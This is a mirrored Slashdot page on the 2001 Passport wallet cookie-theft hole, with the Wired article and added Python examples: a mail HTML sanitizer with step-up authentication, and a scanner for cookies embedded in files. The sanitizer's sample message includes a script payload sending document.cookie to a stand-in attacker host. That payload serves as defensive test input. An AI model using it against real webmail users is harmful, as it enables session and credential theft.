Slashdot Mirror


Passport's Pocket Picked

emmons writes: "It looks like there's another hole in MS Passport according to Wired. This one allows a user to steal another user's Passport Wallet, credit cards and all, by getting them to open a Hotmail message. Nice." What happens when someone steals the basket with all your eggs?

3 of 327 comments

  1. Here is the text of the article... by mnemon1c · · Score: 0, Redundant

    To correct serious security flaws, Microsoft on Friday disabled the virtual wallet function of its Passport service and has begun notifying partners about the vulnerabilities, the company has confirmed.

    The bugs in Passport, a sign-on service used by more than 165 million people, were discovered this week by Marc Slemko, a software developer who lives near Microsoft's Redmond, Washington, headquarters. Slemko is a founding member of the Apache Software Foundation.

    By cobbling together a handful of browser-based bugs with flaws in Passport's authentication system, Slemko developed a technique to steal a person's Microsoft Passport, credit card numbers -- and all, simply by getting the victim to open a Hotmail message.

    The attack raises new questions about the inherent security of Passport, which is being positioned by Microsoft as the linchpin of its .NET e-commerce service initiative.

    In a demonstration of the exploit earlier this week, Slemko sent Wired News a specially crafted but innocent-looking e-mail. Moments after the e-mail was viewed using Microsoft's Hotmail Web-based e-mail service, Slemko rattled off, over the phone, the credit card number and contact information from the user's Passport wallet.

    According to a notice at the service's site, the Passport wallet enables users to store credit card and address information "in a secure, online location. Only you have access to the information in your .NET Passport wallet."

    Introduced in 1999, Passport is what Microsoft calls a "platform service" and is being pitched to merchants and other partners as a convenient and secure means of determining whether site users are who they claim to be.

    Besides enabling Web surfers to access Hotmail and several other secure sites with a single log-in, Passport includes a wallet system that speeds shoppers' checkout at dozens of sites that deploy the Passport Express Purchase technology.

    In an e-mail today to Slemko, Passport's lead program manager for security and authentication, Chris Peterson, said the wallet service will remain offline until the company can add additional security features "to ensure that similar exploits cannot be used to compromise our users' credit card information."

    Microsoft's Hotmail is the largest service currently utilizing the Passport authentication system, but the technology has also been deployed by eBay to allow users of the online auction service to sign into their accounts.

    In addition, Microsoft's MoneyCentral personal finance site relies on Passport's sign-on technology.

    Prior to being fixed by Microsoft, the authentication flaws discovered by Slemko could have enabled an attacker "to do anything as if they were the Passport holder," including editing the user's portfolio at MoneyCentral, or changing users' auctions at eBay, he said.

    More than 70 sites are in the process of deploying Passport's authentication technology, according to Microsoft. Among them is Prudential Banking's Egg.com online bank, which is switching to Passport from an authentication system developed by Entrust Inc., according to published reports.

    Besides posting it at his site, Slemko intends to release the technical details on several security mailing lists Friday "so that, if they choose, users and partners can choose to reduce the impact on themselves," he said. Because of the severity of the flaws, Slemko withheld publication until Microsoft had an opportunity to correct them.

    According to Microsoft, the company has patched two bugs utilized by Slemko's exploit: an HTML filtering issue in Hotmail as well as a cross-site scripting flaw in its Passport server configurations. In addition, the company has modified a software timer so that Passport users must re-enter their password anytime they attempt to access the wallet service.

    While Slemko's exploit, which relied on stealing browser cookies used by Passport, has been rendered inoperable by Microsoft's fixes, the programmer said "deeper issues" remain with the service.

    "Passport's greatest marketing strength -- the single sign-on -- is also its chief technical weakness. It will be fairly trivial for attackers to dream up new ways of exploiting this," he said.

    Slemko is not the first to reach this conclusion. Last year, researchers at AT&T published a paper that observed that Microsoft's single sign-on service "carries significant risks to users" and warned that "Passport must be viewed with suspicion."

    Microsoft subsequently fixed the bugs identified in the AT&T report and issued a response, down-playing the researchers' conclusion that Passport is inherently flawed and promising new security features in the future.

    One fruit of that promise is in Microsoft's recently released Windows XP operating system, which attempts to improve the security of Passport's sign-on system by moving the authentication out of the browser and embedding it into the operating system.

    Microsoft has also adopted what it calls a "federation" model for Passport that will allow other authentication vendors to create systems that interoperate with Microsoft's platform.

    But critics still contend that granting Microsoft control over a massive set of personal data creates intolerable security risks.

    "If history has shown us anything, it's that the best protection lies in decentralizing power and promoting competition. We need to take the same approach to our digital identities and make sure that who and what we are is not held captive by a single entity," wrote Whitfield Diffie, one of the inventors of public-key cryptography, and Susan Landau, a senior staff engineer at Sun Microsystems, in an editorial published last week.

    According to Slemko, the fact that he needed just half an hour to cook up a way to exploit Passport's security flaws indicates that Microsoft is not fit to run a service with Passport's ambitions.

    "It is very clear that either Microsoft does not have sufficient resources in place to properly review the security of their services and software, or that they are aware of the shortcomings but decided that attempting to gain market share was more important than their users' security," he said.

    --
    Ah, the last peanut -- overflowing with the oil and salt of its departed brothers. -Homer
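The article above describes a chain of an HTML filtering weakness in the webmail front end, script that reads the browser's cookies, and a session that was valid for the wallet without any fresh password check. The following is an added example, not code from the article, from Slemko or from Microsoft, showing the two server-side controls the fixes correspond to: an allow-list HTML sanitizer for incoming mail, and a step-up re-authentication check before a high-value resource such as a wallet is touched. The tag and attribute policy, the 120-second freshness window, the hostnames and the sample message are all hypothetical and constructed for the demonstration.

```python
"""Added example: allow-list mail sanitizer plus wallet step-up auth.
Not the Hotmail or Passport code; policy values are hypothetical."""
import html
import re
from html.parser import HTMLParser

# Hypothetical allow-list policy: anything not listed here is dropped.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "a", "ul", "ol", "li", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
RAW_TEXT_TAGS = {"script", "style"}   # their bodies are dropped entirely


class MailSanitizer(HTMLParser):
    """Rebuild the message from an allow-list; record everything removed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []       # audit trail, e.g. "script", "img@onerror"
        self._in_raw = None     # name of the script/style tag being skipped

    @staticmethod
    def _safe_url(value):
        # Strip control characters and whitespace first so that tricks such as
        # "java\tscript:" or "\x00javascript:" cannot slip past the scheme check.
        v = re.sub(r"[\x00-\x20]", "", value).lower()
        return v.startswith(SAFE_URL_SCHEMES)

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            if tag in RAW_TEXT_TAGS:
                self._in_raw = tag
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")        # e.g. onerror=
                continue
            if name in ("href", "src") and not self._safe_url(value):
                self.dropped.append(f"{tag}@{name}")        # e.g. javascript:
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag == self._in_raw:
            self._in_raw = None
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._in_raw:
            return                       # never emit script/style bodies
        self.out.append(html.escape(data))


def sanitize(message_html):
    """Return (clean_html, list_of_dropped_items) for one incoming message."""
    s = MailSanitizer()
    s.feed(message_html)
    s.close()
    return "".join(s.out), s.dropped


# Step-up authentication: a session cookie alone must not open the wallet.
WALLET_REAUTH_WINDOW = 120   # seconds; hypothetical value for the example


def wallet_access_allowed(session, now):
    """True only if the password was re-entered within the freshness window.

    A stolen cookie gives the attacker the session, but not the password, so
    a sensitive resource demands proof of a recent password entry."""
    verified_at = session.get("password_verified_at")
    return verified_at is not None and 0 <= now - verified_at <= WALLET_REAUTH_WINDOW


# Constructed sample message of the shape the article describes: it looks
# innocent but carries script and event handlers that read document.cookie.
SAMPLE_MESSAGE = (
    '<p>Hi</p>'
    '<script>new Image().src="https://attacker.test/c?"+document.cookie</script>'
    '<img src="https://example.test/x.png" onerror="steal()">'
    '<a href="javascript:alert(1)">c</a>'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_MESSAGE)
    print("clean:  ", clean)
    print("dropped:", dropped)
    print("wallet with fresh password:", wallet_access_allowed({"password_verified_at": 1000}, 1050))
    print("wallet with stale session: ", wallet_access_allowed({"password_verified_at": 1000}, 1300))
```

The sanitizer rebuilds the message from what it positively allows rather than stripping patterns it recognises as bad, which is the property the original filter evidently lacked. The `dropped` list is worth logging: a burst of `script` and `img@onerror` removals across many mailboxes is exactly the signal that someone is trying this attack at scale.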
  2. Technology @ Ebay by slugfro · · Score: 0, Redundant

    I know most readers here aren't using hotmail but the article also mentions that the technology has also been deployed [Microsoft Press Release] on Ebay. Thought you might want to know!

    --

    -- Find the Truth...
  3. Embedded cookies in MS Word documents? by Anonymous Coward · · Score: 1, Redundant

    Sorry, this is offtopic, but it is related to MS and cookies:

    I received an MS Word doc from a colleague. Since I didn't want to reboot to Windows, I tried using a conversion tool (wvHtml) on it, but it crashed. So out of desperation, I ran strings on the doc file. What did I find?

    I found paragraphs of text, of course. However, I also found Netscape format cookies. Some were cookies from potentially sensitive sites, so it seems to me that these cookies shouldn't be in a doc file.

    Is this expected behavior? I am not familiar with the MS Word file format, so I am hoping someone who is can explain.

    Thanks...
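The poster above found Netscape-format cookie records by running strings over a binary document. The following is an added example, not the poster's code, that does the same check more precisely: it scans an arbitrary byte blob for records with the seven tab-separated fields of the Netscape cookies.txt format (domain, domain flag, path, secure flag, expiry, name, value) and reports them with the values redacted, so a file can be checked for leaked credentials before it is forwarded. The sample document bytes are constructed for the example; only the eight-byte OLE2 header at the start is a real signature, the rest is filler.

```python
"""Added example: find Netscape cookies.txt records embedded in a binary file.
The sample blob below is constructed, not a real document."""
import re

# One cookies.txt record: seven fields separated by tabs, terminated by a newline.
# Control characters (including tab) are excluded from the free-text fields so a
# match cannot run across record boundaries or into surrounding binary data.
COOKIE_RECORD = re.compile(
    rb"(?P<domain>\.?[A-Za-z0-9][A-Za-z0-9.\-]*)\t"
    rb"(?P<domain_flag>TRUE|FALSE)\t"
    rb"(?P<path>/[^\x00-\x1f]*)\t"
    rb"(?P<secure>TRUE|FALSE)\t"
    rb"(?P<expiry>\d{1,10})\t"
    rb"(?P<name>[^\x00-\x1f=;]+)\t"
    rb"(?P<value>[^\x00-\x1f]*)"
)


def find_cookie_records(blob):
    """Return a list of dicts, one per cookie record found anywhere in blob."""
    records = []
    for m in COOKIE_RECORD.finditer(blob):
        records.append({
            "offset": m.start(),
            "domain": m["domain"].decode("latin-1"),
            "path": m["path"].decode("latin-1"),
            "secure": m["secure"] == b"TRUE",
            "expiry": int(m["expiry"]),
            "name": m["name"].decode("latin-1"),
            "value": m["value"].decode("latin-1"),
        })
    return records


def redact(value, keep=2):
    """Show only the first few characters so the report itself is safe to share."""
    if len(value) <= keep:
        return "*" * len(value)
    return value[:keep] + "*" * (len(value) - keep)


def report(blob):
    """Human-readable lines, one per record, with cookie values redacted."""
    return [
        f"offset {r['offset']}: {r['domain']}{r['path']} {r['name']}={redact(r['value'])}"
        f" secure={r['secure']} expires={r['expiry']}"
        for r in find_cookie_records(blob)
    ]


# Constructed sample: OLE2 compound-file magic, some document text, two
# cookie records and binary filler, mimicking what strings(1) would walk over.
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16
    + b"Dear colleague, here is the draft.\x00\x00"
    + b".example.test\tTRUE\t/\tFALSE\t1009843200\tuserid\tjdoe\n"
    + b"\x00\x03\x7f"
    + b"shop.example.test\tFALSE\t/cart\tTRUE\t1009843200\tSESSIONID\t8f2c0a1b9e\n"
    + b"\xff" * 8
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DOC
    for line in report(data):
        print(line)
```

Run it with a path argument to scan a real file; without one it scans the constructed sample. A hit does not tell you how the cookies got into the file, only that they are there, which is the question the poster needed answered before the document went anywhere else.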